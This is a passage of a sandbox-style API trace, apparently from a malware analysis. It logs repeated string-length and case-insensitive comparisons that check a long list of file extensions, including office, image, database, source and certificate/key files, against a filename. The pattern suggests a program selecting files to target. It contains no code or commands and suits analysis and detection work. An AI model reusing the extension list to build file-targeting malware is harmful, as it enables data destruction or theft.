(lpString=".accde") returned 6 [0284.634] lstrcmpiW (lpString1=".accde", lpString2="D.LOG1") returned -1 [0284.634] lstrlenW (lpString=".accdt") returned 6 [0284.634] lstrcmpiW (lpString1=".accdt", lpString2="D.LOG1") returned -1 [0284.634] lstrlenW (lpString=".accdw") returned 6 [0284.634] lstrcmpiW (lpString1=".accdw", lpString2="D.LOG1") returned -1 [0284.634] lstrlenW (lpString=".adb") returned 4 [0284.634] lstrcmpiW (lpString1=".adb", lpString2="LOG1") returned -1 [0284.634] lstrlenW (lpString=".adp") returned 4 [0284.634] lstrcmpiW (lpString1=".adp", lpString2="LOG1") returned -1 [0284.634] lstrlenW (lpString=".ai") returned 3 [0284.634] lstrcmpiW (lpString1=".ai", lpString2="OG1") returned -1 [0284.634] lstrlenW (lpString=".ai3") returned 4 [0284.634] lstrcmpiW (lpString1=".ai3", lpString2="LOG1") returned -1 [0284.634] lstrlenW (lpString=".ai4") returned 4 [0284.634] lstrcmpiW (lpString1=".ai4", lpString2="LOG1") returned -1 [0284.634] lstrlenW (lpString=".ai5") returned 4 [0284.635] lstrcmpiW (lpString1=".ai5", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".ai6") returned 4 [0284.635] lstrcmpiW (lpString1=".ai6", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".ai7") returned 4 [0284.635] lstrcmpiW (lpString1=".ai7", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".ai8") returned 4 [0284.635] lstrcmpiW (lpString1=".ai8", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".anim") returned 5 [0284.635] lstrcmpiW (lpString1=".anim", lpString2=".LOG1") returned -1 [0284.635] lstrlenW (lpString=".arw") returned 4 [0284.635] lstrcmpiW (lpString1=".arw", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".as") returned 3 [0284.635] lstrcmpiW (lpString1=".as", lpString2="OG1") returned -1 [0284.635] lstrlenW (lpString=".asa") returned 4 [0284.635] lstrcmpiW (lpString1=".asa", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".asc") returned 4 [0284.635] lstrcmpiW (lpString1=".asc", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".ascx") returned 5 [0284.635] lstrcmpiW (lpString1=".ascx", lpString2=".LOG1") returned -1 [0284.635] lstrlenW (lpString=".asm") returned 4 [0284.635] lstrcmpiW (lpString1=".asm", lpString2="LOG1") returned -1 [0284.635] lstrlenW (lpString=".asmx") returned 5 [0284.635] lstrcmpiW (lpString1=".asmx", lpString2=".LOG1") returned -1 [0284.635] lstrlenW (lpString=".asp") returned 4 [0284.635] lstrcmpiW (lpString1=".asp", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".aspx") returned 5 [0284.636] lstrcmpiW (lpString1=".aspx", lpString2=".LOG1") returned -1 [0284.636] lstrlenW (lpString=".asr") returned 4 [0284.636] lstrcmpiW (lpString1=".asr", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".asx") returned 4 [0284.636] lstrcmpiW (lpString1=".asx", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".avi") returned 4 [0284.636] lstrcmpiW (lpString1=".avi", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".avs") returned 4 [0284.636] lstrcmpiW (lpString1=".avs", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".backup") returned 7 [0284.636] lstrcmpiW (lpString1=".backup", lpString2="CD.LOG1") returned -1 [0284.636] lstrlenW (lpString=".bak") returned 4 [0284.636] lstrcmpiW (lpString1=".bak", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".bay") returned 4 [0284.636] lstrcmpiW (lpString1=".bay", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".bd") returned 3 [0284.636] lstrcmpiW (lpString1=".bd", lpString2="OG1") returned -1 [0284.636] lstrlenW (lpString=".bin") returned 4 [0284.636] lstrcmpiW (lpString1=".bin", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".bmp") returned 4 [0284.636] lstrcmpiW (lpString1=".bmp", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".bz2") returned 4 [0284.636] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0284.636] lstrlenW (lpString=".c") returned 2 [0284.639] lstrcmpiW (lpString1=".c", lpString2="G1") returned -1 [0284.639] lstrlenW (lpString=".cdr") returned 4 [0284.639] lstrcmpiW (lpString1=".cdr", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".cer") returned 4 [0284.639] lstrcmpiW (lpString1=".cer", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".cf") returned 3 [0284.639] lstrcmpiW (lpString1=".cf", lpString2="OG1") returned -1 [0284.639] lstrlenW (lpString=".cfc") returned 4 [0284.639] lstrcmpiW (lpString1=".cfc", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".cfm") returned 4 [0284.639] lstrcmpiW (lpString1=".cfm", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".cfml") returned 5 [0284.639] lstrcmpiW (lpString1=".cfml", lpString2=".LOG1") returned -1 [0284.639] lstrlenW (lpString=".cfu") returned 4 [0284.639] lstrcmpiW (lpString1=".cfu", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".chm") returned 4 [0284.639] lstrcmpiW (lpString1=".chm", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".cin") returned 4 [0284.639] lstrcmpiW (lpString1=".cin", lpString2="LOG1") returned -1 [0284.639] lstrlenW (lpString=".class") returned 6 [0284.639] lstrcmpiW (lpString1=".class", lpString2="D.LOG1") returned -1 [0284.639] lstrlenW (lpString=".clx") returned 4 [0284.639] lstrcmpiW (lpString1=".clx", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".config") returned 7 [0284.640] lstrcmpiW (lpString1=".config", lpString2="CD.LOG1") returned -1 [0284.640] lstrlenW (lpString=".cpp") returned 4 [0284.640] lstrcmpiW (lpString1=".cpp", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".cr2") returned 4 [0284.640] lstrcmpiW (lpString1=".cr2", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".crt") returned 4 [0284.640] lstrcmpiW (lpString1=".crt", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".crw") returned 4 [0284.640] lstrcmpiW (lpString1=".crw", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".cs") returned 3 [0284.640] lstrcmpiW (lpString1=".cs", lpString2="OG1") returned -1 [0284.640] lstrlenW (lpString=".css") returned 4 [0284.640] lstrcmpiW (lpString1=".css", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".csv") returned 4 [0284.640] lstrcmpiW (lpString1=".csv", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".cub") returned 4 [0284.640] lstrcmpiW (lpString1=".cub", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".dae") returned 4 [0284.640] lstrcmpiW (lpString1=".dae", lpString2="LOG1") returned -1 [0284.640] lstrlenW (lpString=".dat") returned 4 [0284.640] lstrcmpiW (lpString1=".dat", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".db") returned 3 [0284.641] lstrcmpiW (lpString1=".db", lpString2="OG1") returned -1 [0284.641] lstrlenW (lpString=".dbf") returned 4 [0284.641] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dbx") returned 4 [0284.641] lstrcmpiW (lpString1=".dbx", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dc3") returned 4 [0284.641] lstrcmpiW (lpString1=".dc3", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dcm") returned 4 [0284.641] lstrcmpiW (lpString1=".dcm", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dcr") returned 4 [0284.641] lstrcmpiW (lpString1=".dcr", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".der") returned 4 [0284.641] lstrcmpiW (lpString1=".der", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dib") returned 4 [0284.641] lstrcmpiW (lpString1=".dib", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dic") returned 4 [0284.641] lstrcmpiW (lpString1=".dic", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".dif") returned 4 [0284.641] lstrcmpiW (lpString1=".dif", lpString2="LOG1") returned -1 [0284.641] lstrlenW (lpString=".divx") returned 5 [0284.642] lstrcmpiW (lpString1=".divx", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".djvu") returned 5 [0284.642] lstrcmpiW (lpString1=".djvu", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".dng") returned 4 [0284.642] lstrcmpiW (lpString1=".dng", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".doc") returned 4 [0284.642] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".docm") returned 5 [0284.642] lstrcmpiW (lpString1=".docm", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".docx") returned 5 [0284.642] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".dot") returned 4 [0284.642] lstrcmpiW (lpString1=".dot", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".dotm") returned 5 [0284.642] lstrcmpiW (lpString1=".dotm", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".dotx") returned 5 [0284.642] lstrcmpiW (lpString1=".dotx", lpString2=".LOG1") returned -1 [0284.642] lstrlenW (lpString=".dpx") returned 4 [0284.642] lstrcmpiW (lpString1=".dpx", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".dqy") returned 4 [0284.642] lstrcmpiW (lpString1=".dqy", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".dsn") returned 4 [0284.642] lstrcmpiW (lpString1=".dsn", lpString2="LOG1") returned -1 [0284.642] lstrlenW (lpString=".dt") returned 3 [0284.643] lstrcmpiW (lpString1=".dt", lpString2="OG1") returned -1 [0284.643] lstrlenW (lpString=".dtd") returned 4 [0284.643] lstrcmpiW (lpString1=".dtd", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".dwg") returned 4 [0284.643] lstrcmpiW (lpString1=".dwg", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".dwt") returned 4 [0284.643] lstrcmpiW (lpString1=".dwt", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".dx") returned 3 [0284.643] lstrcmpiW (lpString1=".dx", lpString2="OG1") returned -1 [0284.643] lstrlenW (lpString=".dxf") returned 4 [0284.643] lstrcmpiW (lpString1=".dxf", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".edml") returned 5 [0284.643] lstrcmpiW (lpString1=".edml", lpString2=".LOG1") returned -1 [0284.643] lstrlenW (lpString=".efd") returned 4 [0284.643] lstrcmpiW (lpString1=".efd", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".elf") returned 4 [0284.643] lstrcmpiW (lpString1=".elf", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".emf") returned 4 [0284.643] lstrcmpiW (lpString1=".emf", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".emz") returned 4 [0284.643] lstrcmpiW (lpString1=".emz", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".epf") returned 4 [0284.643] lstrcmpiW (lpString1=".epf", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".eps") returned 4 [0284.643] lstrcmpiW (lpString1=".eps", lpString2="LOG1") returned -1 [0284.643] lstrlenW (lpString=".epsf") returned 5 [0284.643] lstrcmpiW (lpString1=".epsf", lpString2=".LOG1") returned -1 [0284.643] lstrlenW (lpString=".epsp") returned 5 [0284.644] lstrcmpiW (lpString1=".epsp", lpString2=".LOG1") returned -1 [0284.644] lstrlenW (lpString=".erf") returned 4 [0284.644] lstrcmpiW (lpString1=".erf", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".exr") returned 4 [0284.644] lstrcmpiW (lpString1=".exr", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".f4v") returned 4 [0284.644] lstrcmpiW (lpString1=".f4v", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".fido") returned 5 [0284.644] lstrcmpiW (lpString1=".fido", lpString2=".LOG1") returned -1 [0284.644] lstrlenW (lpString=".flm") returned 4 [0284.644] lstrcmpiW (lpString1=".flm", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".flv") returned 4 [0284.644] lstrcmpiW (lpString1=".flv", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".frm") returned 4 [0284.644] lstrcmpiW (lpString1=".frm", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".fxg") returned 4 [0284.644] lstrcmpiW (lpString1=".fxg", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".geo") returned 4 [0284.644] lstrcmpiW (lpString1=".geo", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".gif") returned 4 [0284.644] lstrcmpiW (lpString1=".gif", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".grs") returned 4 [0284.644] lstrcmpiW (lpString1=".grs", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".gz") returned 3 [0284.644] lstrcmpiW (lpString1=".gz", lpString2="OG1") returned -1 [0284.644] lstrlenW (lpString=".h") returned 2 [0284.644] lstrcmpiW (lpString1=".h", lpString2="G1") returned -1 [0284.644] lstrlenW (lpString=".hdr") returned 4 [0284.644] lstrcmpiW (lpString1=".hdr", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".hpp") returned 4 [0284.644] lstrcmpiW (lpString1=".hpp", lpString2="LOG1") returned -1 [0284.644] lstrlenW (lpString=".hta") returned 4 [0284.645] lstrcmpiW (lpString1=".hta", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".htc") returned 4 [0284.645] lstrcmpiW (lpString1=".htc", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".htm") returned 4 [0284.645] lstrcmpiW (lpString1=".htm", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".html") returned 5 [0284.645] lstrcmpiW (lpString1=".html", lpString2=".LOG1") returned -1 [0284.645] lstrlenW (lpString=".icb") returned 4 [0284.645] lstrcmpiW (lpString1=".icb", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".ics") returned 4 [0284.645] lstrcmpiW (lpString1=".ics", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".iff") returned 4 [0284.645] lstrcmpiW (lpString1=".iff", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".inc") returned 4 [0284.645] lstrcmpiW (lpString1=".inc", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".indd") returned 5 [0284.645] lstrcmpiW (lpString1=".indd", lpString2=".LOG1") returned -1 [0284.645] lstrlenW (lpString=".ini") returned 4 [0284.645] lstrcmpiW (lpString1=".ini", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".iqy") returned 4 [0284.645] lstrcmpiW (lpString1=".iqy", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".j2c") returned 4 [0284.645] lstrcmpiW (lpString1=".j2c", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".j2k") returned 4 [0284.645] lstrcmpiW (lpString1=".j2k", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".java") returned 5 [0284.645] lstrcmpiW (lpString1=".java", lpString2=".LOG1") returned -1 [0284.645] lstrlenW (lpString=".jp2") returned 4 [0284.645] lstrcmpiW (lpString1=".jp2", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".jpc") returned 4 [0284.645] lstrcmpiW (lpString1=".jpc", lpString2="LOG1") returned -1 [0284.645] lstrlenW (lpString=".jpe") returned 4 [0284.645] lstrcmpiW (lpString1=".jpe", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".jpeg") returned 5 [0284.646] lstrcmpiW (lpString1=".jpeg", lpString2=".LOG1") returned -1 [0284.646] lstrlenW (lpString=".jpf") returned 4 [0284.646] lstrcmpiW (lpString1=".jpf", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".jpg") returned 4 [0284.646] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".jpx") returned 4 [0284.646] lstrcmpiW (lpString1=".jpx", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".js") returned 3 [0284.646] lstrcmpiW (lpString1=".js", lpString2="OG1") returned -1 [0284.646] lstrlenW (lpString=".jsf") returned 4 [0284.646] lstrcmpiW (lpString1=".jsf", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".json") returned 5 [0284.646] lstrcmpiW (lpString1=".json", lpString2=".LOG1") returned -1 [0284.646] lstrlenW (lpString=".jsp") returned 4 [0284.646] lstrcmpiW (lpString1=".jsp", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".kdc") returned 4 [0284.646] lstrcmpiW (lpString1=".kdc", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".kmz") returned 4 [0284.646] lstrcmpiW (lpString1=".kmz", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".kwm") returned 4 [0284.646] lstrcmpiW (lpString1=".kwm", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".lasso") returned 6 [0284.646] lstrcmpiW (lpString1=".lasso", lpString2="D.LOG1") returned -1 [0284.646] lstrlenW (lpString=".lbi") returned 4 [0284.646] lstrcmpiW (lpString1=".lbi", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".lgf") returned 4 [0284.646] lstrcmpiW (lpString1=".lgf", lpString2="LOG1") returned -1 [0284.646] lstrlenW (lpString=".lgp") returned 4 [0284.646] lstrcmpiW (lpString1=".lgp", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".log") returned 4 [0284.647] lstrcmpiW (lpString1=".log", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".m1v") returned 4 [0284.647] lstrcmpiW (lpString1=".m1v", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".m4a") returned 4 [0284.647] lstrcmpiW (lpString1=".m4a", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".m4v") returned 4 [0284.647] lstrcmpiW (lpString1=".m4v", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".max") returned 4 [0284.647] lstrcmpiW (lpString1=".max", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".md") returned 3 [0284.647] lstrcmpiW (lpString1=".md", lpString2="OG1") returned -1 [0284.647] lstrlenW (lpString=".mda") returned 4 [0284.647] lstrcmpiW (lpString1=".mda", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".mdb") returned 4 [0284.647] lstrcmpiW (lpString1=".mdb", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".mde") returned 4 [0284.647] lstrcmpiW (lpString1=".mde", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".mdf") returned 4 [0284.647] lstrcmpiW (lpString1=".mdf", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".mdw") returned 4 [0284.647] lstrcmpiW (lpString1=".mdw", lpString2="LOG1") returned -1 [0284.647] lstrlenW (lpString=".mef") returned 4 [0284.647] lstrcmpiW (lpString1=".mef", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mft") returned 4 [0284.648] lstrcmpiW (lpString1=".mft", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mfw") returned 4 [0284.648] lstrcmpiW (lpString1=".mfw", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mht") returned 4 [0284.648] lstrcmpiW (lpString1=".mht", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mhtml") returned 6 [0284.648] lstrcmpiW (lpString1=".mhtml", lpString2="D.LOG1") returned -1 [0284.648] lstrlenW (lpString=".mka") returned 4 [0284.648] lstrcmpiW (lpString1=".mka", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mkidx") returned 6 [0284.648] lstrcmpiW (lpString1=".mkidx", lpString2="D.LOG1") returned -1 [0284.648] lstrlenW (lpString=".mkv") returned 4 [0284.648] lstrcmpiW (lpString1=".mkv", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mos") returned 4 [0284.648] lstrcmpiW (lpString1=".mos", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mov") returned 4 [0284.648] lstrcmpiW (lpString1=".mov", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mp3") returned 4 [0284.648] lstrcmpiW (lpString1=".mp3", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mp4") returned 4 [0284.648] lstrcmpiW (lpString1=".mp4", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mpeg") returned 5 [0284.648] lstrcmpiW (lpString1=".mpeg", lpString2=".LOG1") returned 1 [0284.648] lstrlenW (lpString=".mpg") returned 4 [0284.648] lstrcmpiW (lpString1=".mpg", lpString2="LOG1") returned -1 [0284.648] lstrlenW (lpString=".mpv") returned 4 [0284.648] lstrcmpiW (lpString1=".mpv", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".mrw") returned 4 [0284.649] lstrcmpiW (lpString1=".mrw", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".msg") returned 4 [0284.649] lstrcmpiW (lpString1=".msg", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".mxl") returned 4 [0284.649] lstrcmpiW (lpString1=".mxl", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".myd") returned 4 [0284.649] lstrcmpiW (lpString1=".myd", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".myi") returned 4 [0284.649] lstrcmpiW (lpString1=".myi", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".nef") returned 4 [0284.649] lstrcmpiW (lpString1=".nef", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".nrw") returned 4 [0284.649] lstrcmpiW (lpString1=".nrw", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".obj") returned 4 [0284.649] lstrcmpiW (lpString1=".obj", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".odb") returned 4 [0284.649] lstrcmpiW (lpString1=".odb", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".odc") returned 4 [0284.649] lstrcmpiW (lpString1=".odc", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".odm") returned 4 [0284.649] lstrcmpiW (lpString1=".odm", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".odp") returned 4 [0284.649] lstrcmpiW (lpString1=".odp", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".ods") returned 4 [0284.649] lstrcmpiW (lpString1=".ods", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".oft") returned 4 [0284.649] lstrcmpiW (lpString1=".oft", lpString2="LOG1") returned -1 [0284.649] lstrlenW (lpString=".one") returned 4 [0284.650] lstrcmpiW (lpString1=".one", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".onepkg") returned 7 [0284.650] lstrcmpiW (lpString1=".onepkg", lpString2="CD.LOG1") returned -1 [0284.650] lstrlenW (lpString=".onetoc2") returned 8 [0284.650] lstrcmpiW (lpString1=".onetoc2", lpString2="BCD.LOG1") returned -1 [0284.650] lstrlenW (lpString=".opt") returned 4 [0284.650] lstrcmpiW (lpString1=".opt", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".oqy") returned 4 [0284.650] lstrcmpiW (lpString1=".oqy", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".orf") returned 4 [0284.650] lstrcmpiW (lpString1=".orf", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".p12") returned 4 [0284.650] lstrcmpiW (lpString1=".p12", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".p7b") returned 4 [0284.650] lstrcmpiW (lpString1=".p7b", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".p7c") returned 4 [0284.650] lstrcmpiW (lpString1=".p7c", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pam") returned 4 [0284.650] lstrcmpiW (lpString1=".pam", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pbm") returned 4 [0284.650] lstrcmpiW (lpString1=".pbm", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pct") returned 4 [0284.650] lstrcmpiW (lpString1=".pct", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pcx") returned 4 [0284.650] lstrcmpiW (lpString1=".pcx", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pdd") returned 4 [0284.650] lstrcmpiW (lpString1=".pdd", lpString2="LOG1") returned -1 [0284.650] lstrlenW (lpString=".pdf") returned 4 [0284.651] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pdp") returned 4 [0284.651] lstrcmpiW (lpString1=".pdp", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pef") returned 4 [0284.651] lstrcmpiW (lpString1=".pef", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pem") returned 4 [0284.651] lstrcmpiW (lpString1=".pem", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pff") returned 4 [0284.651] lstrcmpiW (lpString1=".pff", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pfm") returned 4 [0284.651] lstrcmpiW (lpString1=".pfm", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pfx") returned 4 [0284.651] lstrcmpiW (lpString1=".pfx", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".pgm") returned 4 [0284.651] lstrcmpiW (lpString1=".pgm", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".php") returned 4 [0284.651] lstrcmpiW (lpString1=".php", lpString2="LOG1") returned -1 [0284.651] lstrlenW (lpString=".php3") returned 5 [0284.651] lstrcmpiW (lpString1=".php3", lpString2=".LOG1") returned 1 [0284.651] lstrlenW (lpString=".php4") returned 5 [0284.651] lstrcmpiW (lpString1=".php4", lpString2=".LOG1") returned 1 [0284.651] lstrlenW (lpString=".php5") returned 5 [0284.651] lstrcmpiW (lpString1=".php5", lpString2=".LOG1") returned 1 [0284.652] lstrlenW (lpString=".phtml") returned 6 [0284.652] lstrcmpiW (lpString1=".phtml", lpString2="D.LOG1") returned -1 [0284.652] lstrlenW (lpString=".pict") returned 5 [0284.652] lstrcmpiW (lpString1=".pict", lpString2=".LOG1") returned 1 [0284.652] lstrlenW (lpString=".pl") returned 3 [0284.652] lstrcmpiW (lpString1=".pl", lpString2="OG1") returned -1 [0284.652] lstrlenW (lpString=".pls") returned 4 [0284.652] lstrcmpiW (lpString1=".pls", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".pm") returned 3 [0284.652] lstrcmpiW (lpString1=".pm", lpString2="OG1") returned -1 [0284.652] lstrlenW (lpString=".png") returned 4 [0284.652] lstrcmpiW (lpString1=".png", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".pnm") returned 4 [0284.652] lstrcmpiW (lpString1=".pnm", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".pot") returned 4 [0284.652] lstrcmpiW (lpString1=".pot", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".potm") returned 5 [0284.652] lstrcmpiW (lpString1=".potm", lpString2=".LOG1") returned 1 [0284.652] lstrlenW (lpString=".potx") returned 5 [0284.652] lstrcmpiW (lpString1=".potx", lpString2=".LOG1") returned 1 [0284.652] lstrlenW (lpString=".ppa") returned 4 [0284.652] lstrcmpiW (lpString1=".ppa", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".ppam") returned 5 [0284.652] lstrcmpiW (lpString1=".ppam", lpString2=".LOG1") returned 1 [0284.652] lstrlenW (lpString=".ppm") returned 4 [0284.652] lstrcmpiW (lpString1=".ppm", lpString2="LOG1") returned -1 [0284.652] lstrlenW (lpString=".pps") returned 4 [0284.653] lstrcmpiW (lpString1=".pps", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".ppsm") returned 5 [0284.653] lstrcmpiW (lpString1=".ppsm", lpString2=".LOG1") returned 1 [0284.653] lstrlenW (lpString=".ppt") returned 4 [0284.653] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".pptm") returned 5 [0284.653] lstrcmpiW (lpString1=".pptm", lpString2=".LOG1") returned 1 [0284.653] lstrlenW (lpString=".pptx") returned 5 [0284.653] lstrcmpiW (lpString1=".pptx", lpString2=".LOG1") returned 1 [0284.653] lstrlenW (lpString=".prn") returned 4 [0284.653] lstrcmpiW (lpString1=".prn", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".ps") returned 3 [0284.653] lstrcmpiW (lpString1=".ps", lpString2="OG1") returned -1 [0284.653] lstrlenW (lpString=".psb") returned 4 [0284.653] lstrcmpiW (lpString1=".psb", lpString2="LOG1") returned -1 [0284.653] lstrlenW (lpString=".psd") returned 4 [0284.653] 